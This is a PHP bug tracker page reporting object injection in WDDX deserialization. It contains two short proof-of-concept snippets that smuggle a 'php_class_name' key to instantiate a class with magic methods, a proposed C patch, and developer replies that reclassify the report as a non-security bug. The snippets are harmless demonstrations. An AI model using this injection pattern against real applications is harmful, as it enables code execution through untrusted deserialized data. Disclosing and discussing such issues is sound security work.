php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #75044 Object Injection in PHP's WDDX Serialization
Submitted: 2017-08-07 10:20 UTC Modified: 2017-08-13 19:40 UTC
From: taoguangchen at icloud dot com Assigned:
Status: Open Package: WDDX related
PHP Version: 5.6.31 OS: *
Private report: No CVE-ID: None
View Add Comment Developer Edit
Welcome! If you don't have a Git account, you can't do anything here.
You can add a comment by following this link or if you reported this bug, you can edit this bug over here.
(description)
Block user comment
Status: Assign to:
Package:
Bug Type:
Summary:
From: taoguangchen at icloud dot com
New email:
PHP Version: OS:

 

 [2017-08-07 10:20 UTC] taoguangchen at icloud dot com
Description:
------------
PoC 1:
```
class ryat {
	var $hi;
	function __wakeup() {
		echo 'hi';
	}
	function __destruct() {
		echo $this->hi;
	}
}

$array = ['php_class_name'=>'ryat', 'hi'=>'ryat'];
wddx_deserialize(wddx_serialize_value($array));
```
PoC 2:
```
ini_set('session.serialize_handler', 'wddx');
session_start();

$array = ['php_class_name'=>'ryat', 'hi'=>'ryat'];
$_SESSION['ryat'] = $array;
session_decode(session_encode());

class ryat {
	var $hi;
	function __wakeup() {
		echo 'hi';
	}
	function __destruct() {
		echo $this->hi;
	}
}
```

Fix:
```
static void php_wddx_serialize_array(wddx_packet *packet, zval *arr)
{
...
		if (is_struct) {
			ent_type = zend_hash_get_current_key_ex(target_hash, &key, &key_len, &idx, 0, NULL);

			if (ent_type == HASH_KEY_IS_STRING) {
+				if (!strcmp(key, PHP_CLASS_NAME_VAR)) {
+					continue;
+				}
				php_wddx_serialize_var(packet, *ent, key, key_len TSRMLS_CC);
```


Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2017-08-07 19:50 UTC] stas@php.net
The proposed fix doesn't seem to fix anything in fact, as it's changing serialization, not unserialization, but the question is should we consider this an issue? I.e. if wddx supports live php objects, it would be basically in the same class as unserialize, with same (none) security guarantees as it seems.
 [2017-08-13 19:40 UTC] cmb@php.net
-Type: Security +Type: Bug
 [2017-08-13 19:40 UTC] cmb@php.net
> it would be basically in the same class as unserialize, with
> same (none) security guarantees as it seems.

Indeed, it is; see <http://news.php.net/php.internals/100183> and
<http://svn.php.net/viewvc?view=revision&revision=342852>.
 
PHP Copyright © 2001-2017 The PHP Group
All rights reserved.
Last updated: Sun Nov 19 01:31:42 2017 UTC